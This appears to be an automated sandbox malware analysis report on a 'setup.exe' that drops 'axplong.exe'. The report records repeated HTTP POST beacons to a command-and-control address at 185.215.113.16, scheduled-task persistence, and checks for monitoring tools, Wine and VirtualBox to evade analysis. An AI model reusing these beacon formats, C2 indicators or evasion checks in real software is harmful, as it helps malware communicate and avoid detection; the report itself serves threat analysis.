                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: Joe Sandbox View | IP Address: 185.215.113.16
                  Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                  Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00A7BD60 InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile
                  Source: unknown | HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php

                  System Summary

                  Source: setup.exe | Static PE information: section name:
                  Source: setup.exe | Static PE information: section name: .idata
                  Source: setup.exe | Static PE information: section name:
                  Source: axplong.exe.0.dr | Static PE information: section name:
                  Source: axplong.exe.0.dr | Static PE information: section name: .idata
                  Source: axplong.exe.0.dr | Static PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\setup.exe | File created: C:\Windows\Tasks\axplong.job
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00A74CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AB3068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00A7E440
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AA7D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00A74AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AB765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AB2BD0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AB8720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AB6F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Code function: 13_2_00AB777B
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
                  Source: setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: setup.exe | Static PE information: Section: ZLIB complexity 0.9973284230245232
                  Source: setup.exe | Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
                  Source: axplong.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9973284230245232
                  Source: axplong.exe.0.dr | Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\setup.exe | File created: C:\Users\user~1\AppData\Local\Temp\44111dbc49
                  Source: C:\Users\user\Desktop\setup.exe | File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: setup.exe | ReversingLabs: Detection: 55%
                  Source: setup.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                  Source: setup.exe Static file information: File size 1939456 > 1048576
                  Source: setup.exe Static PE information: Raw size of etmksbbt is bigger than: 0x100000 < 0x1a7e00

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 4.2.axplong.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 13.2.axplong.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
                  Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.dr Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
                  Source: setup.exe Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
                  Source: setup.exe Static PE information: section name:
                  Source: setup.exe Static PE information: section name: .idata
                  Source: setup.exe Static PE information: section name:
                  Source: setup.exe Static PE information: section name: etmksbbt
                  Source: setup.exe Static PE information: section name: iosnleeh
                  Source: setup.exe Static PE information: section name: .taggant
                  Source: axplong.exe.0.dr Static PE information: section name:
                  Source: axplong.exe.0.dr Static PE information: section name: .idata
                  Source: axplong.exe.0.dr Static PE information: section name:
                  Source: axplong.exe.0.dr Static PE information: section name: etmksbbt
                  Source: axplong.exe.0.dr Static PE information: section name: iosnleeh
                  Source: axplong.exe.0.dr Static PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A8D84C push ecx; ret 13_2_00A8D85F
                  Source: setup.exe Static PE information: section name: entropy: 7.979174049479235
                  Source: setup.exe Static PE information: section name: etmksbbt entropy: 7.953652307689506
                  Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.979174049479235
                  Source: axplong.exe.0.dr Static PE information: section name: etmksbbt entropy: 7.953652307689506
                  Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass
                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: Regmonclass
                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: Filemonclass
                  Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
                  Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job
                  Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
